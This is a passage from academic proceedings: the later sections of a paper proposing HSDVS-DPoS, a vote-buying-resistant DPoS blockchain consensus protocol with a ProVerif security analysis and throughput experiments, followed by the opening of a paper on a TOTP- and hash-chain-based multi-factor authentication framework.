HSDVS-DPoS: A Secure and Heterogeneous DPoS Consensus Protocol
Ordinary node
Witness candidate node
Stakeholder node
Witness node
Block producer node
Registration node
545
Counting node
Fig. 2. Roles.
4. Witness node: the top N witness candidate nodes of statistics results in counting phase are witness nodes selected to produce block. 5. Block producer node: witness node participate in block production phase. The nodes are for produce block and verify transactions. 6. Registration node: the node that does the following work. • Scan the information of witness candidate nodes to form a list named ListW • Check whether the Token is bigger than 0 according to the address of the stakeholder node. If Token is bigger than 0, then it’s qualified. After qualified, a blank electronic ballot including the ListW is sent. • Scan the basic information of the stakeholder nodes to form a list of ListS, and sent the blank electronic ballot to the counting node. The function of ListS is to provide a basis for facilitate the counting node in the counting phase, and verify the identity of the stakeholder node, as well as count the received votes. 7. Counting node: the node for counting votes and release votes. Its function is to clean up invalid ballots and count valid ballots, and release statistical results, signatures with ballots, signature simulation with ballots. 4.2 Relationship of Roles Relationship of roles involved to roles transformation, which is shown in Fig. 3. 1. Ordinary nodes transform to stakeholder node if he holds Token. 2. A stakeholder node votes for witness candidate node in list of ListW. The counting node starts counting votes when the timestamp of the voting phase is reached. And the top N witness candidate nodes in statistical results transformed to witness nodes.
hold token
Ordinary node
vote for
Stakeholder node
produce block
Witness candidate node
Witness node
Select the top N according to voting results
Registration node
Counting node
Fig. 3. Relationship of roles
Block producer node
546
C. Zhao et al.
3. A witness node transforms to block producer node if he participates in block production phase.
4.3 Data Structure Symbols and its meaning are illustrated in Table 1. Table 1. Symbol and meaning Symbol
Meaning
R
Registration node
S
Stakeholder node
C
Counting node
WitCan
Witness Candidate node
Witness
Witness node
Token
Stake
IDj , j = 1,2,..,n
Identity of stakeholder node S
IDi , i = 1,2,..,n
Identity of witness candidate node
Ballot
Ballot information
ListS
List of Stakeholder node S
ListW
List of Witness Candidate node
s
Signature generated by a stakeholder node in Fig. 1
s’
Signature simulation generated by a counting node C
Node
Note information
krc
Shared key between registration node R and counting node C
sks
Private key of stakeholder node S
skc
Private key of counting node C
A node information includes public key PK, private key SK and Address. PK and Address are public, and SK is private and is used to consume asset and generate signature. The asset is available to someone who knows SK. For a node, consuming asset needs private key. Data structure of a node is shown in Fig. 4.
Public key PK
Private key SK
Fig. 4. A node
Address
node
HSDVS-DPoS: A Secure and Heterogeneous DPoS Consensus Protocol
547
ListS in Fig. 5 includes IDj and Tokenj information, in which IDj means identity of Sj, Tokenj means stake of Sj.
Identity of stakeholder node ID j
Tokenj
ListS
Fig. 5. ListS
ListW in Fig. 6 includes IDi and PKi information, in which IDi means identity of Witcani, PKi means public key of Witcani.
Identity of witness candidate node ID i
Pubic key of witness candidate node PKi
ListW
Fig. 6. ListW
s in Fig. 7 is σ = sig (PK S , SK S , PK C ) and m. Data item s means that a signature generated by stakeholder node on Ballot. σ = sig (PK S , SK S , PK C ) is a signature generated by a stakeholder node, and m is an arbitrary message sent by a stakeholder node. PK S means public key of S, SK S means private key of S, PK C means public key of C. Because of applying the heterogeneous strong designated verifier signature scheme, the signer and the designated verifier are in heterogeneous cryptography environment. Assuming that a stakeholder node belonging to PKI cryptosystem is the signer, and the counting node belonging to IBC cryptosystem is the designated verifier. A stakeholder node generates a signature, and then sends the signature and Ballot to the designated verifier. The counting node verifies the validity of signature of s on Ballot, if it verifies successfully, then accepts it; otherwise rejects it.
m
σ=sig(PKS , SKS , PKC)
s
Fig. 7. s
Ballot in Fig. 8 includes ListW, state and timestamp. A witness candidate node on ListW has a state. The change of state’s value reflects stakeholder node’s voting. The default value of state is set to 0. If a stakeholder node votes for a node on ListW, its state value is set to 1. The length of state is 1 bit. The position of the status bit is corresponding to the identity IDi of the witness candidate node. The stakeholder node participates in voting or not is determined according to whether the value of state is 1.
548
C. Zhao et al. ListW
state corresponding to ListW
timestamp
Ballot
Fig. 8. Ballot
Timestamp is the time when a ballot is send to counting node. If timestamp ≤ deadline is true, then the ballot is valid and is counted; otherwise, the ballot is invalid and will not be counted. 4.4 Consensus Phases There are four phases in HSDVS-DPoS consensus: Registration phase, Voting phase, Counting phase, Block production phase in Table 2 to Table 5, respectively. Registration Phase The Registration phase is shown in Table 2: Table 2. Registration phase
The steps in the registration phase in Fig. 9 are as follows: Based on the premise: the node is registered in the P2P network and becomes an ordinary node. If the Token of the ordinary node is greater than 0, the role is transformed into a stakeholder node.
HSDVS-DPoS: A Secure and Heterogeneous DPoS Consensus Protocol
549
A stakeholder node S sends message1: Address to R. R receives message1: Address from S, and then queries Token of S using Address of S, if Token is greater than 0, then R sends message2: a blank Ballot to S. Otherwise, does not send. R scans the information of the witness candidate node to form the list of ListW and sets the range of the witness candidate node as the stakeholder node. R generates ballot using ListW as message 3: response. R scans the information of S and uses krc to encrypt ListS, and sends them to the counting node C as message 4. Krc is a shared secret key of R and C. C responses. Corresponds to message 5 in Fig. 9.
(1) send(Address) Registration phase
(2) send(Ballot) (3) send Ballot(ListW) Registration node R
(5) response
Stakeholder node S
(4) send encrypt(ListS)
Counting node C
Fig. 9. Registration phase.
Voting Phase The Voting phase is shown in Table 3: The steps of the voting phase in Fig. 12 are as follows: 1. S generates message 1: (S, Ballot) for a witness candidate node WitCani in ListW and sends it to C. When S selects the candidate nodes of witnesses in ListW, the state of the corresponding bit is set to 1, and the timestamp is automatically generated by the system. Among them, s = (σ, m), σ = sig(PK S , SK S , PK C ). 2. C responses. Corresponds to message 2 in Fig. 10.
550
C. Zhao et al. Table 3. Voting Phase
Voting phase (1) send(s,Ballot) (2) response Stakeholder node S
Counting node C
Fig. 10. Voting phase
Counting Phase The Counting phase is shown in Table 4: The steps in the counting phase are as follows: 1. Before counting ballots, according to the counting rules, repeated ballots and invalid ballots will be removed. Only valid ballots are counted. C calculates the results. The top N witness candidate nodes are selected as witness nodes. 2. C first verifies the stakeholder node’s signature s = (σ, Ballot), in which σ = Sig(PK S , SK S , PK C ) using private key SK C and the public key PK S of S to determine whether the signature is valid. If it is valid, C uses Formula (1) to calculate the ballots according to the weight of S. After that, C generates a signature simulation s’ = (σ ’, m), σ ’ = Sig(PK S , SK C , PK C ). 3. C publishes the results of the ballots, as well as the public signatures for ballots (s, Ballot) and signatures simulation for ballots (s’, Ballot).
HSDVS-DPoS: A Secure and Heterogeneous DPoS Consensus Protocol
551
Table 4. Block production phase
Block Production Phase The Block production phase is shown in Table 5: Table 5. Block Production Phase
The steps of the block production phase are as follows: As long as the witness candidate node is selected as the witness node, they will produce a block with equal rights, independent of the number of ballots obtained in the counting phase.
552
C. Zhao et al.
These N witness nodes take turns to be responsible for the bookkeeping. The witness nodes shall be assigned in an order, and then the witness nodes participate in block production in a determined order, if the witness node Witnessi does not produce a block in a given timestamp, the next witness node Witnessi+1 who is in the assigned order will participate in block production. When each witness node acts as a block producer node, he is only responsible for producing one block. The produced blocks are transmitted to the next witness node in the order in which blocks are produced. The second witness node packs the new block and confirms the transaction contents of the previous block. When a certain block is confirmed by more than 2/3 of the total number of witness nodes, the block becomes an irreversible block. That is, the block that is confirmed becomes a block on the blockchain.
5 Discussion In this section, focusing on the existing problems of the current DPoS consensus protocols [3, 9–11]: no consideration on vote buying, candidate cheating and no support in heterogeneous cryptography communication mechanism, the corresponding solution to the problem in HSDVS-DPoS are discussed. 5.1 Counting Phase In DPoS consensus protocols [3, 9–11, 13–17], the number of votes of stakeholder node is determined by stake. The number of votes is proportional to stake. DPoS consensus protocol uses approval voting mechanism, each account is allowed one vote per share per witness, and the top N are selected as witness nodes. The number of N is defined as such that least 50% of stakeholders participating in voting believe that there is sufficient decentralization. Stakeholder nodes should vote for at least M witness nodes when they clearly declare the number of M. This raises the question of the greater influence of nodes with more stakes. In order to address the above problem, in the proposed HSDVS-DPoS consensus protocol, the counting phase is introduced. In the counting phase, the number of votes is directly proportional to the stake that is converted into the proportion of votes. Formula (1) is used for counting votes when counting received ballots. Considering the case that voter nodes participate in voting not actively, set the vote beyond setting timestamp that is not in range of votes counted. The worst case is the wait for the end forever. Because if partial stakeholder nodes don’t participate in voting phase, the voting phase may never end if waited for so. Therefore, the end of voting phase is setting in one fixed timestamp to make the voting phase controlled. The calculation formula of the number of votes obtained by the witness candidate node is as shown in Formula (1): vote =
t i=m
Token(IDi ) ∗ status(IDi )
(1)
HSDVS-DPoS: A Secure and Heterogeneous DPoS Consensus Protocol
In which
t
553
Token(IDi ) is the sum of stake that stakeholder node vote for witness
i=m
candidate node IDi . status(IDi ) means the number of status of witness candidate node with identity IDi , and the status’ value is 1. Hence, the proposed HSDVS-DPoS consensus protocol has voting phase. 5.2 Rules of Counting The ballots are divided into valid Ballot, invalid Ballot and repeated Ballot. And only the valid ballots are counted. 1. Valid Ballot: the following four conditions are all met. • • • •
There is no blank data item in a Ballot. The signature of stakeholder node is verified successfully. If timestamp ≤ deadline is true, the timestamp is valid. The number of state in a Ballot is denoted as status, the value is 1.
2. Invalid Ballot: any one of the following four conditions is met. • • • •
There exists blank data item in a Ballot. The signature of stakeholder node is unable to be verified successfully. If timestamp > deadline is true, then timestamp is invalid. Status is 0.
3. Repeated Ballot: any one of the following four conditions is met. • If the number of states, where state value is 1 and it is greater than 2 in a Ballot (status > = 2). • If there are more than one timestamps in a Ballot, the ballot is repeated. • If the two signatures are same in different ballots, a stakeholder node votes twice.
6 Security Analysis In this section, the security of the proposed HSDVS-DPoS consensus protocol including authentication, secrecy, anonymity, fairness, verifiability, coercion-resistance and receipt-freeness is analyzed. First, authentication and secrecy is analyzed. Then with the condition that the registration node and the counting node are honest, anonymity, fairness, verifiability, coercion-resistance and receipt-freeness are analyzed. 6.1 Authentication and Secrecy Authentication and secrecy is analyzed with ProVerif [25], which is a formal tool developed for analyzing protocol security by Bruno Blanchet. ProVerif is an automatic cryptographic protocol verifier based on a representation of the protocol by Horn clauses
554
C. Zhao et al.
and the Applied PI calculus. When ProVerif cannot prove a security property, it can reconstruct an attack; ProVerif can prove secrecy, authentication and more generally correspondence properties. ProVerif uses the non-injective agreement implemented by using query event 1 == >event 2 to model the authentication. It is true when if the event 1 has been executed, then the event 2 must have been executed (before the event 1). Here we use the query event in Fig. 11 to express the mutual authentications between registration node R and counting node C, and between the registration node R and the stakeholder node S in HSDVS-DPoS consensus protocol. In HSDVS-DPoS consensus protocol, secrecy of krc, sks and skc are need to be verified. Krc is a shared key between registration node R and counting node C. sks is the private key of stakeholder. Skc is the private key of counting node. We use the statements query attacker:kcr, query attacker: sks and query attacker:skc in ProVerif to verify the secrecy of krc, sks and skc, respectively. The query secrecy and authentications in ProVerif is in Fig. 11. ⎡ query attacker:krc; (*the secrecy of share key*) ⎤ ⎢ query attacker:sks; (*the secrecy of private key*) ⎥ ⎢ ⎥ ⎢ query attacker:skc. (*the secrecy of private key*) ⎥ ⎢ ⎥ ⎢ ⎥ ⎢ query ev:endauthR(x,y) → ev: beginauthR(x,y). ⎥ ⎢ ⎥ ⎢ (*registration node R authenticates counting node C*) ⎥ ⎢ query ev:endauthC(x,y) → ev˖beginauthC(x,y). ⎥ ⎢ ⎥ ⎢ (*counting node C authenticates registration node R*) ⎥ ⎢ ⎥ ⎢ query ev:endauthS(x,y,z,t) → ev˖beginauthS(x,y,z,t). ⎥ ⎢ (*registration node R authenticates stakeholder node S *) ⎥ ⎢ ⎥ ⎢query ev:endauthS(x) → ev˖beginauthS(x). ⎥ ⎢(*stakeholder node S authenticates registration node R*) ⎥ ⎣ ⎦ Fig. 11. Secrecy and authentications in ProVerif
First, HSDVS-DPoS consensus protocol is formalized with Applied PI calculus, and then translated it into form of ProVerif input, finally, authentication and secrecy is analyzed. The results of authentications and secrecy in Table 6 and Table 7 are ‘TRUE’, which show that it has mutual authentications between registration node R and counting node C, and between the registration node R and the stakeholder node S, and secrecy of krc, sks and skc.
HSDVS-DPoS: A Secure and Heterogeneous DPoS Consensus Protocol
555
Table 6. Authentications Non-injective agreement
Authentications
Result
event(endauthR(x,y)) ==>event(beginauthR(x,y))
registration node R authenticates counting node C
TRUE
event(endauthC(x,y)) ==>event(beginauthC(x,y))
counting node C authenticates registration node R
TRUE
event(endauthS(x,y,z,t)) ==>event(beginauthS(x,y,z,t))
registration node R authenticates stakeholder node S
TRUE
event(endauthS(x)) ==>event(beginauthS(x))
stakeholder node S authenticates registration node R
TRUE
Table 7. Secrecy Event
Secrecy
Result
query attacker(krc) shared key krc between registration node R and counting node C TRUE query attacker(sks) private key sks of stakeholder node S
TRUE
query attacker(skc) private key skc of counting node C
TRUE
6.2 Anonymity Definition: Anonymity means that the identity of the voter is kept private while voting. Proof: During the voting process, the stakeholder node sends the signature with the padded ballot, which does not directly relate to real identity. After the ballots are published in the counting phase, the stakeholder node is also unable to prove his own ballot to other people. 6.3 Fairness Definition: Fairness means that no one knows the current results of the voting phase. Proof: After the timestamp of voting phase is reached in the counting phase adopted by the HSDVS-DPoS consensus, the counting node deals with the votes received, and then counts the valid votes and publishes the results. Therefore, no one knows the current results of voting phase before the votes and results are made public. 6.4 Verifiability Definition: Verifiability means that the voter checks his own ballot counted.
556
C. Zhao et al.
Proof: Signature with ballot, as well as signature simulation with ballot are made public. Signature with ballot are generated by the voter himself, and a stakeholder node is able to check its own signature and ballot, finally determine that the vote is counted or not. 6.5 Receipt-Freeness Definition: the voter cannot produce a receipt to prove that he votes a special ballot. Its purpose is to protect against vote buying. Proof: The ballot is published, and the counting node can produce a signature simulation s . Signature s and the ballot, signature simulation s and the ballot, they can be verified successfully by anyone. First of all, the third party cannot trust the counting node, because the information disclosed by the counting node includes signatures with ballots as well as signature simulation with ballots. And the existence of the signature simulation distinguish the true source of the signature. Therefore, the third party cannot verify the validity of the signatures or signature simulation without the private key of the counting node. Secondly, although the stakeholder nodes are bribed or threatened by the attacker and select to vote for the special witness candidate node A, there is no receipt that can prove that one of the votes was cast by himself. Because a stakeholder node only knows his generated signature with ballot, he cannot prove this truth to the third party. There are two signatures so that the third party don’t know which one is really the true one. Therefore, bribe fails. Finally, even though stakeholder nodes send their own private key to the third party, verifying the signature still needs the counting node’s private key. A stakeholder node could only find his voting information in public and cannot verify whether another signature is true. Because the signature simulation also can be verified successfully, the attacker can’t trust the stakeholder node enough. Furthermore, from the privacy perspective, it’s almost impossible to happen. Owing to the control of an account depends on the account’s private key, if a stakeholder node sends his private key to the third party who may take control of the account and vote on itself, it would make the stakeholder node at a disadvantage. It’s mainly because the private key determines the control of the account. 6.6 Coercion-Resistance Definition: Coercion-resistance means that the voters vote without being threatened by the attacker. Proof: There is no receipt that can be used to prove that the vote casted by the stakeholder node is a particular one. It’s impossible to prove this to the third party.
7 Experiment In order to better compare the differences between HSDVS-DPoS and other DPoS consensus protocols, this section presents the overall design, throughout and time spent on block production for the proposed HSDVS-DPoS consensus protocol.
HSDVS-DPoS: A Secure and Heterogeneous DPoS Consensus Protocol
557
7.1 Overall Design Windows 10 64-bit, eclipse software, Java programming language are used as experiment environment to simulate HSDVS-DPoS consensus protocol. The framework design of the test application for implementing the HDVSS- DPoS consensus is shown in Fig. 12. The consensus layer adopts the proposed HSDVS-DPoS consensus protocol. The network layer uses sockets and ports to simulate the sending and receiving of messages among blockchain network nodes. And the data layer adopts encryption algorithm and hash function to encrypt and decrypt data.
HDVSS-DPoS consensus
Consensus layer port
Socket
Network layer Encryption algorithm
Hash function
Data layer
Fig. 12. Design of test framework.
7.2 Experimental Evaluation This section mainly analyzes the performance of the proposed HSDVS-DPoS consensus protocol from two evaluation indexes: throughput and time spent on block production. Since the proposed HSDVS-DPoS consensus protocol adopts the heterogeneous designated verifier signature. Assuming that the stakeholder node is in the PKI environment and the counting node is in the IBC environment. Throughput: represents the time cost to record all operations in each phase in each consensus round. Assuming that the total number of messages is MT and the total time spent is TotalTime in seconds/piece, the throughput TPS is calculated according to Formula (2): TPS = TotalTime /MT
(2)
Block production Time: represents the time cost to produce blocks. The total time of consensus operation spent is Time, the number of blocks in block production phase, the unit is measured in s/each block, and the time spent to block production is calculated according to Formula (3): producetime = Time /count
(3)
The number of nodes selected in the experiment is set to be 15. Therefore, there are 15 nodes in total in the simulated blockchain network. Three witness candidate nodes are elected as witness nodes by voting, and the value of N is 3. That is, N = 3. The result is shown in Fig. 14, throughput maintained at 50–60 s/piece.
558
C. Zhao et al.
Figure 13 shows the throughput of 15, 100, 500, 1000, 3000, 5000, 10000 nodes respectively, and the number of consensus round is set at 20. The number of nodes is 100 and the throughput is maintained at 50–60 s/piece. The throughput is maintained at 120–140 s/piece when the number of nodes is 300. The throughput is maintained at 110–130 s/piece when the number of nodes is 500. The throughput is maintained at 110–130 s/piece when the number of nodes is 1000. As shown in Fig. 13, the throughput is maintained at 120–150 s/piece when the number of nodes is 3000. The throughput is maintained at 130–150 s/piece when the number of nodes is 5000. The throughput is maintained at 130–170 s/piece when the number of nodes is 10000.
Fig. 13. Throughput of the different number of nodes
When the number of nodes is 300, 500, 1000 respectively, the throughput is relatively stable. The throughput changes in values with little variation, and remains at 110–140 s/piece. When the number of nodes is 300, 5000, the throughput is maintained at 120–150 s/piece. Compared with the changing trend of the throughput in values when the number of nodes is 300, 500, 1000, the throughput values shows an obvious increasing trend. When the number of nodes is 10000, the throughput is maintained at 130–170 s/piece. Obviously, with the significant increase of the number of nodes, the change of throughput in values shows a continuous increasing trend, indicating that the time for processing messages is on the increasing trend, while the time for processing messages is extended and the throughput is decreased. 7.3 Experimental Results and Analysis This section sets different number of nodes in order to simulate different scale of blockchain network. The statistics is calculated when the number of nodes is 100, 300,
HSDVS-DPoS: A Secure and Heterogeneous DPoS Consensus Protocol
559
500, 1000, 2000, 3000, 4000, 5000, 10000 respectively, throughput and time spent on block production of application implementing the proposed HSDVS-DPoS consensus protocol. Furthermore, set the number of blocks in block production phase corresponding to different scale of nodes. In order to reduce the experimental deviation, the consensus round is set to 20, the corresponding experimental data are obtained, and the experimental results are averaged. The experimental data finally obtained are shown in Table 8. Table 8. Experimental data The number of nodes (number)
Throughout (s/ piece)
Time spent to block production (s/each block)
15
50.2270
6
100
117.7329
7
300
121.6780
8
500
103.7312
9
1000
120.6829
9
2000
123.6768
10
3000
133.6585
10
4000
136.1063
10
5000
137.9023
12
10000
146.0100
16
Table 8 shows that throughput of application is 50.227 s/piece when the node number is 15, which shows that time spent in dealing with a message is not long, the fastest processing message. However, with the increase of the number of nodes gradually, the values of the throughput increases gradually. If the number of node is 100–5000, throughput value in a range of 104–146 s/piece. According to Fig. 14, it can be easily seen that when the number of nodes is 100, 300, 500, 1000 and 2000 respectively, the throughput of the application is relatively stable and remains at the level of 104–123 s/piece just with a small range of changes. When the number of nodes increases to 3000, 4000, 5000, 10000, the throughput remains at 123-146 s/ piece, and the throughput of the application in values begins to increase significantly. The time of processing a message is prolonged, and the speed of processing the message is slow, and the throughput decreases significantly. As seen from Table 8, when the number of nodes is respectively 100, 300, 500, 1000, 2000, the block producing time is stable, but when the number of nodes is 15, the time spent to block production is 6 s/each block. When the number of nodes is 100, 300, the time spent to block production is 7–8 s/each block. When the number of nodes is 500, 1000, the time spent to block production is 9 s/each block. When the number of nodes is 2000, 3000, 4000, the time spent to block production is 10 s/ each block. When the number of nodes is 5000, the time spent to block production is 12 s/each block. When the number of nodes is 10000, the time spent to block production is 16 s/ each block. According to Fig. 15, the number of nodes is 15, 100, 300, 500, 1000, 2000,
560
C. Zhao et al.
Fig. 14. Tendency of throughout.
Fig. 15. Tendency of time spent in block production.
3000, 4000, and the time spent to block production is gradually increasing, the number of nodes is increased from 5000 to 10000, and the time spent to block production is greatly increasing. Analyze the reason of changes about throughput and time spent to block production, in voting phase, stakeholder nodes employ the heterogeneous designated verifier signature scheme to generate the signature, the generated signature contained by many kinds of operations include bilinear pairings computation, and the bilinear pairings computation is the longest time consuming operations in all kinds of operation, when the number of nodes increases, the number of stakeholders nodes are also on the increase, accordingly, the number of sending signature are increasing, as well as the consumption time. In the counting phase, after the counting of the ballots by the counting node, not only the signatures and ballots must be published, but also the signatures’ simulation and ballots must be published, which consumes significantly more time. Moreover, the number of messages increases with the increase of the number of nodes. When the number of nodes is 100, 300, 500, the increase of the elapsed time of the voting phase and the counting phase is small. When the number of nodes increases to 2000, 3000, 4000, 5000, 10000, the elapsed time of the voting phase and the counting phase increases significantly. As a result, the throughput values increases, the throughput decreases, and time spent to block production increases. When the number of nodes ranges from 15 to 5000, throughput and time spent to block production are stable. When the number of nodes is greater than 5000, throughput decreases and the time to produce blocks increases.
HSDVS-DPoS: A Secure and Heterogeneous DPoS Consensus Protocol
561
8 Conclusion With the popularity of blockchain application, blockchain security has drawn attention of the people, and has become a hot issue. Consensus is a key part of blockchain, because it aims to reach an agreement in producing block. However, with the rapid development of heterogeneous blockchain and IoB, the requirements for secure and heterogeneous consensus is becoming more and more urgent. In order to address vote buying and no support for heterogeneous cryptography communication, based on the ideas of electronic voting, coercion-resistance and receiptfreeness are introduced for consensus. And then, the HSDVS-DPoS is presented and analyzed. The proposed HSDVS-DPoS consensus protocol has authentication, secrecy, anonymity, fairness, verifiability, coercion-resistance and receipt-freeness. The experimental results show that when the number of nodes is between 15 and 5000, the throughput and the time of producing blocks stay stable and change in small range. The number of nodes is bigger than 5000, the throughput decreases, and the time of producing blocks is prolonged. In the future, we will focus on improving the efficiency of the proposed HSDVSDPoS consensus protocol. Funding. This research was supported in part by the National key R&D Program of China No. 2020YFC1522900; the Fundamental Research Funds for the Central Universities No. CZZ21001 and No. QSZ17007; and natural science foundation of Hubei Province under the grants No. 2018ADC150.
References 1. Han, X., Liu, Y.M.: Research on consensus mechanism in blockchain technology. Inform. Netw. Secur. 9, 147–152 (2017) 2. Zheng, Z.B., Xie, S.A., Dai, H.N., et al.: An overview of blockchain technology: architecture, consensus, and future trends. In 2017 IEEE International Congress on Big Data (BigData Congress). Honolulu, HI, USA, IEEE, pp. 557–564 (2017) 3. DPoS Consensus Algorithm - The Missing White Paper [EB/OL]. https://blog.csdn.net/sha ngsongwww/article/details/90300739 4. Wang, S.W.: On information security, network security and network space security. J. Libr. China 2, 72–84 (2015) 5. Castro, M., Liskov, B.: Practical byzantine fault tolerance. In: Proceedings of the Third USENIX Symposium on Operating Systems Design and Implementation (OSDI), New Orleans, Louisiana, USA, pp. 173–186 (1999) 6. Nguyen, G.T., Du, M.X.: A survey about consensus algorithms used in blockchain. In: 2017 IEEE International Conference on Systems, Man, and Cybernetics (SMC), 557–565 (2018) 7. Bitshare[EB/OL]. https://bitshares.org 8. How is DPoS different from traditional PoS [EB/OL]. https://blockgeeks.com/guides/eos-blo ckchain/ 9. Xu, G., Liu, Y., Khan, P.W.: Improvement of the DPoS consensus mechanism in blockchain based on vague sets. IEEE Trans. Industr. Inf. 16(6), 4252–4259 (2020). https://doi.org/10. 1109/TII.2019.2955719 10. Liu, J., Xie, M., Chen, S., et al.: An improved dpos consensus mechanism in blockchain based on plts for the smart autonomous multi-robot system. Inform. Sci. 575 (12), 528–541 2021
562
C. Zhao et al.
11. Hu, Q., Chen, W.B., Chen, Y.Y.: HQDPoS: DPoS-Based Hybrid Consensus Mechanism. In: Jia Y., Zhang W., Fu Y., Yu Z., Zheng S. (eds) Proceedings of 2021 Chinese Intelligent Systems Conference. Lecture Notes in Electrical Engineering, vol 804. Springer, Singapore (2022). https://doi.org/10.1007/978-981-16-6324-6_72 12. Wang, Y.B., Wang, X.X., Meng, B., et al.: A Secure and Multual Heterogeneous Strong Designated Signature Between PKI and IBC, Plos one 13. Fan, X., Chai, Q.: Roll-DPoS: A randomized delegated proof of stake scheme for scalable blockchain-based internet of things systems. In: MobiQuitous ‘18: Proceedings of the 15th EAI International Conference on Mobile and Ubiquitous Systems: Computing, Networking and Services, pp. 482–484 (2018) 14. Snider, M., Samani, K., Jain, T.: Delegated proof of stake: features & tradeoffs. https://mul ticoin.capital/2018/03/02/delegated-proof-stake-features-tradeoffs/. Accessed 15 Jan 2021 15. Huang, J., Xu, X., Wang, S.: Improved scheme of delegated proof of stake consensus mechanism. J. Comput. Appl. 39(7), 2162–2167 (2019) 16. Liu, W., Li, Y., Wang, X., Peng, Y., She, W., Tian, Z.: A donation tracing blockchain model using improved DPoS consensus algorithm. Peer-to-Peer Netw. Appl. 14(5), 2789–2800 (2021). https://doi.org/10.1007/s12083-021-01102-9 17. Wen, X., Li, C., et al.: Visual analysis method of blockchain community evolution based on dpos consensus mechanism. Comput. Sci. 49(01), 328–335 (2022) 18. Ma, X., Ma, M., Liu, X.: A cross domain authentication scheme based on blockchain technology. Acta Electronica Sin. 46(11), 2571–2579 (2018) 19. Li, B., Cao, W.Z., Zhang, J., et al.: Multi-power system trading system and key technologies based on heterogeneous block chain. Autom. Electr. Power Syst. 42(4), 183–193 (2018) 20. Dong, G.S., Chen, Y.X., Li, H.W., et al.: Cross-domain authentication credibility based on blockchain in heterogeneous environment. Commun. Technol. 52(6), 1450–1460 (2019) 21. Vo, H.T., Wang, Z., Karunamoorthy, D., et al.: Internet of blockchains: techniques and challenges ahead. In: 2018 IEEE International Conference on Internet of Things (iThings) and IEEE Green Computing and Communications (GreenCom) and IEEE Cyber, Physical and Social Computing (CPSCom) and IEEE Smart Data (SmartData). IEEE (2018) 22. Li, F., Li, Z.R., Zhao, H.: Research on the progress of blockchain cross-chain technology. J. Softw. 30(6), 1649–1660 (2019) 23. Zamyatin, A., Al-Bassam, M., Zindros, D., et al.: SoK: communication across distributed ledgers (2019) 24. Shao, S., et al.: IBE-BCIOT: an IBE based cross-chain communication mechanism of blockchain in IoT. World Wide Web 24(5), 1665–1690 (2021). https://doi.org/10.1007/s11 280-021-00864-9 25. Blanchet, B.: An efficient cryptographic protocol verifier based on prolog rules. In: Proceedings 14th IEEE Computer Security Foundations Workshop. pp. 82–96. IEEE, Canada 2001)
Framework for Multi-factor Authentication with Dynamically Generated Passwords Ivaylo Chenchev(B) University of Telecommunications and Post, Sofia, Bulgaria [email protected]
Abstract. One of the oldest authentication methods is through a password. The password represents the knowledge element – something you should know to be authenticated. It has been present in scientific publications for many years. Password authentication has been the only method in the early years in which the UNIX operating systems originates. Even nowadays, it can hardly be bypassed. It is still used as a single authentication method in many systems. If there are higher security requirements for a particular scenario, it is used in combination with some other authentication methods and forms two-factor or multi-factor authentications. Usually, the passwords are stored locally on a server, where the users will be authenticated in an encrypted format. Another authentication technique, Time-based One Time Password (TOTP), generates different passcodes, valid for a pre-set short period. The authentication method’s cost is zero based on both techniques. Password authentication is one of the oldest and almost universal authentication methods. The paper suggests an approach for dynamically generated passwords without storing them anywhere and presents a framework for authentication based on combining OTP passcode and classical passwords. This framework for authentication can be used in both users’ and P2Ps’ (host-to-host) authentication. Keywords: Authentication · OTP · TOTP · Password · Two-Factor · 2FA · Multi-Factor · MFA · Security · Hash-Chain · Hash · SHA2 · SHA3
1 Introduction Almost every exposed system in the public internet space could become subject to multiple and varied attacks like offline dictionary attacks, Man-In-The-Middle phishing attacks, pre-computation attacks, Cybersecurity Threats [3], and others. It depends on the purpose of the system and its importance, usage, type of processed and stored information, number of users, availability requirements, etc. In general, every system must be hardened. Securing a system can be achieved with different techniques. Starting with the environment, where it will run, the system’s architecture and topology, an additional network configuration with adding protection mechanisms like local and global firewalls, defining, and using different access zones and access levels, and usage of proper IAM (Identity and Access Management), usage of Multi-Factor Authentication (MFA), and © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 563–576, 2023. https://doi.org/10.1007/978-3-031-28073-3_39
564
I. Chenchev
many more. Such exposure in the Internet system will probably have to manage many users. The users must be authenticated in it before they are given any access. One of the oldest authentication methods is based on classical passwords. The research in [25] reflects on the issue of password authentication and is trying to answer the question if we will ever stop using passwords. It is shared in the paper that if we are about to use more passwords, we cannot use them as we have to. In that regard, we could make wrong password choices (like poor passwords – very short), or we could share them with friends or colleagues, we might not update them regularly, or we could use the same password on multiple systems. The author communicates that the passwords and the PINs have almost universal applicability, and that the deployment of password authentication is at no cost. Finally, Steven Furnell concludes that there is no single solution, and the passwords will not disappear soon. Seven years have passed since this study, and we see the wide usage of passwords and PINs as authentication techniques. We will not get rid of passwords soon. Until then, the research could continue around improving the existing methods. The presented in this paper framework for multi-factor authentication with dynamically generated passwords inherits the benefits from the OTP authentication technique. The OTP passcodes are not stored anywhere. The authenticating parties do not have to memorize and remember passcodes and passwords. The Time-Based One-Time Password (TOTP) uses the current time as a unique element, providing randomness. And in turn, the generated OTP passcode is used to give some of the initial values for the generation of the two classical passwords. The classical passwords are obtained from the last elements of two dynamically generated hash chains with different lengths. The hash-chains have other initial strings and various sizes every time they are calculated. When there is an authentication attempt, an OTP passcode is generated, and two hash chains are generated from it. The OTP passcode, in general, could be classified as an “I know” element because it causes a passcode that can be used. The “shared initial string” must be shared between the client and the server in the synchronization phase. Therefore, the OTP is used as an “I have” element. The classical passwords provide the “I know” element. Both parts provide two factors for multi-factor authentication. The one-time passcodes generated by the TOTP technique are not saved because they are a function of the current time – the moment the authentication starts. The produced two classical passwords are not stored anywhere because they are a function of the generated OTP passcode. In other words, they are generated in real-time. The main focus area in the research is aimed at MFA with both the OTP passcodes and classical passwords because of the following key points: • They are easy to use and implement. • It is pretty easy to be configured: the length of the classical password can be changed easily; the OTP passcodes validity period can be configured. • TOTP provides the randomness. • No passwords are saved anywhere. • Both are easy to deploy and at no cost. The paper consists of an Introduction, a chapter “Literature Review”, a chapter “Challenges and Limitations of the Existing Approaches”, a chapter “The Proposed
Framework for Multi-factor Authentication
565
Authentication Idea” describing the framework for two and three steps authentication with dynamic passwords generation, a chapter called “Experimental Environment” describing the used for the tests’ environments, Results, Conclusion, Further Research, Acknowledgement, and References.
